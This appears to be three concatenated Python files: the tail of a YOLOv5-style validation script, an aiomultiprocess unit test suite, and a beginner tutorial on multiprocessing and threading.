"--device", default="", help="cuda device, i.e. 0 or 0,1,2,3 or cpu"
)
parser.add_argument(
"--single-cls", action="store_true", help="treat as single-class dataset"
)
parser.add_argument("--augment", action="store_true", help="augmented inference")
parser.add_argument("--verbose", action="store_true", help="report mAP by class")
parser.add_argument("--save-txt", action="store_true", help="save results to *.txt")
parser.add_argument(
"--save-hybrid",
action="store_true",
help="save label+prediction hybrid results to *.txt",
)
parser.add_argument(
"--save-conf", action="store_true", help="save confidences in --save-txt labels"
)
parser.add_argument(
"--save-json", action="store_true", help="save a COCO-JSON results file"
)
parser.add_argument(
"--project", default=ROOT / "runs/val", help="save to project/name"
)
parser.add_argument("--name", default="exp", help="save to project/name")
parser.add_argument(
"--exist-ok",
action="store_true",
help="existing project/name ok, do not increment",
)
parser.add_argument(
"--half", action="store_true", help="use FP16 half-precision inference"
)
opt = parser.parse_args()
opt.data = check_yaml(opt.data) # check YAML
opt.save_json |= opt.data.endswith("coco.yaml")
opt.save_txt |= opt.save_hybrid
print_args(FILE.stem, opt)
return opt
def main(opt):
set_logging()
check_requirements(exclude=("tensorboard", "thop"))
if opt.task in ("train", "val", "test"): # run normally
run(**vars(opt))
elif opt.task == "speed": # speed benchmarks
# python val.py --task speed --data coco.yaml --batch 1 --weights yolov5n.pt yolov5s.pt...
for w in opt.weights if isinstance(opt.weights, list) else [opt.weights]:
run(
opt.data,
weights=w,
batch_size=opt.batch_size,
imgsz=opt.imgsz,
conf_thres=0.25,
iou_thres=0.45,
device=opt.device,
save_json=False,
plots=False,
)
elif opt.task == "study": # run over a range of settings and save/plot
# python val.py --task study --data coco.yaml --iou 0.7 --weights yolov5n.pt yolov5s.pt...
x = list(range(256, 1536 + 128, 128)) # x axis (image sizes)
for w in opt.weights if isinstance(opt.weights, list) else [opt.weights]:
f = f"study_{Path(opt.data).stem}_{Path(w).stem}.txt" # filename to save to
y = [] # y axis
for i in x: # img-size
print(f"\nRunning {f} point {i}...")
r, _, t = run(
opt.data,
weights=w,
batch_size=opt.batch_size,
imgsz=i,
conf_thres=opt.conf_thres,
iou_thres=opt.iou_thres,
device=opt.device,
save_json=opt.save_json,
plots=False,
)
y.append(r + t) # results and times
np.savetxt(f, y, fmt="%10.4g") # save
os.system("zip -r study.zip study_*.txt")
plot_val_study(x=x) # plot
if __name__ == "__main__":
opt = parse_opt()
main(opt)
|
core.py
|
# Copyright 2018 John Reese
# Licensed under the MIT license
import asyncio
import sys
import time
from unittest import TestCase
from unittest.mock import patch
import aiomultiprocess as amp
from .base import (
async_test,
do_nothing,
get_dummy_constant,
initializer,
raise_fn,
sleepy,
two,
)
class CoreTest(TestCase): # pylint: disable=too-many-public-methods
def setUp(self):
# reset to default context before each test
amp.set_start_method()
@async_test
async def test_process(self):
p = amp.Process(target=sleepy, name="test_process")
p.start()
self.assertEqual(p.name, "test_process")
self.assertTrue(p.pid)
self.assertTrue(p.is_alive())
await p.join()
self.assertFalse(p.is_alive())
@async_test
async def test_process_await(self):
p = amp.Process(target=sleepy, name="test_process")
await p
self.assertIsNotNone(p.exitcode)
p = amp.Process(target=sleepy, name="test_process")
p.start()
await p
self.assertIsNotNone(p.exitcode)
@async_test
async def test_process_join(self):
p = amp.Process(target=sleepy, name="test_process")
with self.assertRaisesRegex(ValueError, "must start process"):
await p.join()
p.start()
await p.join()
self.assertIsNotNone(p.exitcode)
@async_test
async def test_process_daemon(self):
p = amp.Process(daemon=False)
self.assertEqual(p.daemon, False)
p.daemon = True
self.assertEqual(p.daemon, True)
p = amp.Process(daemon=True)
self.assertEqual(p.daemon, True)
p.daemon = False
self.assertEqual(p.daemon, False)
@async_test
async def test_process_terminate(self):
start = time.time()
p = amp.Process(target=asyncio.sleep, args=(1,), name="test_process")
p.start()
p.terminate()
await p.join()
self.assertLess(p.exitcode, 0)
self.assertLess(time.time() - start, 0.6)
@async_test
async def test_process_kill(self):
p = amp.Process(target=sleepy)
p.start()
if sys.version_info >= (3, 7):
p.kill()
await p.join()
self.assertLess(p.exitcode, 0)
else:
with self.assertRaises(AttributeError):
p.kill()
await p.join()
@async_test
async def test_process_close(self):
p = amp.Process(target=sleepy)
p.start()
if sys.version_info >= (3, 7):
with self.assertRaises(ValueError):
self.assertIsNone(p.exitcode)
p.close()
await p.join()
self.assertIsNotNone(p.exitcode)
p.close()
with self.assertRaises(ValueError):
_ = p.exitcode
else:
with self.assertRaises(AttributeError):
p.close()
await p.join()
@async_test
async def test_process_timeout(self):
p = amp.Process(target=sleepy)
p.start()
with self.assertRaises(asyncio.TimeoutError):
await p.join(timeout=0.01)
@async_test
async def test_worker(self):
p = amp.Worker(target=sleepy)
p.start()
with self.assertRaisesRegex(ValueError, "coroutine not completed"):
_ = p.result
await p.join()
self.assertFalse(p.is_alive())
self.assertEqual(p.result, p.pid)
@async_test
async def test_worker_join(self):
# test results from join
p = amp.Worker(target=sleepy)
p.start()
self.assertEqual(await p.join(), p.pid)
# test awaiting p directly, no need to start
p = amp.Worker(target=sleepy)
self.assertEqual(await p, p.pid)
@async_test
async def test_spawn_method(self):
self.assertEqual(amp.core.get_context().get_start_method(), "spawn")
async def inline(x):
return x
with self.assertRaises(AttributeError):
await amp.Worker(target=inline, args=(1,), name="test_inline")
result = await amp.Worker(target=two, name="test_global")
self.assertEqual(result, 2)
@async_test
async def test_set_start_method(self):
with self.assertRaises(ValueError):
amp.set_start_method("foo")
if sys.platform.startswith("win32"):
amp.set_start_method(None)
self.assertEqual(amp.core.get_context().get_start_method(), "spawn")
with self.assertRaises(ValueError):
amp.set_start_method("fork")
elif sys.platform.startswith("linux") or sys.platform.startswith("darwin"):
amp.set_start_method("fork")
async def inline(x):
return x
result = await amp.Worker(target=inline, args=(17,), name="test_inline")
self.assertEqual(result, 17)
@patch("aiomultiprocess.core.set_start_method")
@async_test
async def test_set_context(self, ssm_mock):
amp.set_context()
ssm_mock.assert_called_with(None)
amp.set_context("foo")
ssm_mock.assert_called_with("foo")
ssm_mock.side_effect = Exception("fake exception")
with self.assertRaisesRegex(Exception, "fake exception"):
amp.set_context("whatever")
@async_test
async def test_initializer(self):
result = await amp.Worker(
target=get_dummy_constant,
name="test_process",
initializer=initializer,
initargs=(10,),
)
self.assertEqual(result, 10)
@async_test
async def test_async_initializer(self):
with self.assertRaises(ValueError) as _:
p = amp.Process(target=sleepy, name="test_process", initializer=sleepy)
p.start()
@async_test
async def test_raise(self):
result = await amp.Worker(
target=raise_fn, name="test_process", initializer=do_nothing
)
self.assertIsInstance(result, RuntimeError)
@async_test
async def test_sync_target(self):
with self.assertRaises(ValueError) as _:
p = amp.Process(
target=do_nothing, name="test_process", initializer=do_nothing
)
p.start()
@async_test
async def test_not_implemented(self):
with self.assertRaises(NotImplementedError):
await amp.core.not_implemented()
|
multiprocess_test.py
|
#importing modules
import multiprocessing
import time
#define function to calculate the square value of a number
def calculate_square(nums):  # worker function: square each value in the list
    for n in nums:
        time.sleep(5)  # slow the loop down so the interleaved output is easy to see
        print('square ' + str(n*n))  # print the square of the current number
#define function to calculate the cube value of a number
def calculate_cube(nums):
for n in nums:
time.sleep(5)
print('cube ' + str(n*n*n) )
# The __main__ guard is left commented out here; this works with the default "fork"
# start method on Linux, but on Windows/macOS ("spawn") the guard is required,
# because each child re-imports the module and would re-launch the processes.
##if __name__ == '__main__':
arrs=[2,3,8,9]
p1 = multiprocessing.Process(target=calculate_square, args=(arrs,))
p2 = multiprocessing.Process(target=calculate_cube, args=(arrs,))
p1.start()#start multiprocess 1
p2.start()#start multiprocess 2
p1.join()  # wait for process 1 to finish
p2.join()  # wait for process 2 to finish
print(p1)
print(p2)
print("Done")
#using map reduce
from multiprocessing import Pool
def f(n):
return n*n
p = Pool(processes=3)
result = p.map(f,[1,2,3,4,5])
for n in result:
print(n)
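# Alternative sketch: the pool can also be used as a context manager, which closes
# and joins it automatically; chunksize just controls how the work is batched
# across the worker processes. Reuses the f() defined above.
with Pool(processes=3) as pool:
    squares = pool.map(f, [1, 2, 3, 4, 5], chunksize=2)
print(squares)  # e.g. [1, 4, 9, 16, 25]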
#using multithread
import threading
t=time.time()  # record the start time so we can measure how long both threads take
t1=threading.Thread(target=calculate_square, args=(arrs,))  # same pattern as Process: target=function, args=arguments
t2=threading.Thread(target=calculate_cube, args=(arrs,))  # same thing but for the cube
t1.start()  # start thread 1
t2.start()  # start thread 2
t1.join()  # wait for thread 1 to finish (join does not stop the thread)
t2.join()  # wait for thread 2 to finish
print('threads done in ' + str(round(time.time() - t, 2)) + ' seconds')  # uses the start time recorded in t above
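# Portable sketch: on Windows/macOS the "spawn" start method re-imports this module
# in every child, so process creation must sit behind the __main__ guard mentioned
# above. A minimal guarded version of the Process demo might look like this
# (_guarded_demo is just an illustrative helper name):
def _guarded_demo():
    q1 = multiprocessing.Process(target=calculate_square, args=([2, 3],))  # shorter input list to keep the rerun quick
    q2 = multiprocessing.Process(target=calculate_cube, args=([2, 3],))
    q1.start()
    q2.start()
    q1.join()  # join() waits for the process to finish; it does not stop it
    q2.join()
if __name__ == '__main__':
    _guarded_demo()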
|